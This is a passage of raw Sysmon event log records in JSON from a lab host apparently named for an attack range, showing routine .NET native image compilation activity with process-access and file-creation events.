{"EventTime":"2020-08-01 06:00:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7977,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:27.856\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04FB-5F25-0000-001091671200}\r\nTargetProcessId: 1364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:27.856","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04FB-5F25-0000-001091671200}","TargetProcessId":"1364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7978,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:27.887\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04FB-5F25-0000-0010FA6A1200}\r\nTargetProcessId: 5040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:27.887","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04FB-5F25-0000-0010FA6A1200}","TargetProcessId":"5040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7979,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:27.887\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04FB-5F25-0000-0010FA6A1200}\r\nTargetProcessId: 5040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:27.887","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04FB-5F25-0000-0010FA6A1200}","TargetProcessId":"5040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7980,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:27.887\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04FB-5F25-0000-0010FA6A1200}\r\nTargetProcessId: 5040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:27.887","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04FB-5F25-0000-0010FA6A1200}","TargetProcessId":"5040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7981,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:27.918\r\nProcessGuid: {A837DB8D-04FB-5F25-0000-0010FA6A1200}\r\nProcessId: 5040\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13b0-0\\System.Xml.Serialization.dll\r\nCreationUtcTime: 2020-08-01 06:00:27.918","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:27.918","ProcessGuid":"{A837DB8D-04FB-5F25-0000-0010FA6A1200}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13b0-0\\System.Xml.Serialization.dll","CreationUtcTime":"2020-08-01 06:00:27.918","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7982,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:27.950\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04DA-5F25-0000-001083871100}\r\nTargetProcessId: 4240\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:27.950","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04DA-5F25-0000-001083871100}","TargetProcessId":"4240","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7983,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:27.950\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04DA-5F25-0000-001083871100}\r\nTargetProcessId: 4240\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:27.950","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04DA-5F25-0000-001083871100}","TargetProcessId":"4240","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7984,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:27.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04DA-5F25-0000-001083871100}\r\nTargetProcessId: 4240\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:27.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04DA-5F25-0000-001083871100}","TargetProcessId":"4240","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7985,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:27.997\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04FC-5F25-0000-0010B5711200}\r\nTargetProcessId: 3372\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed 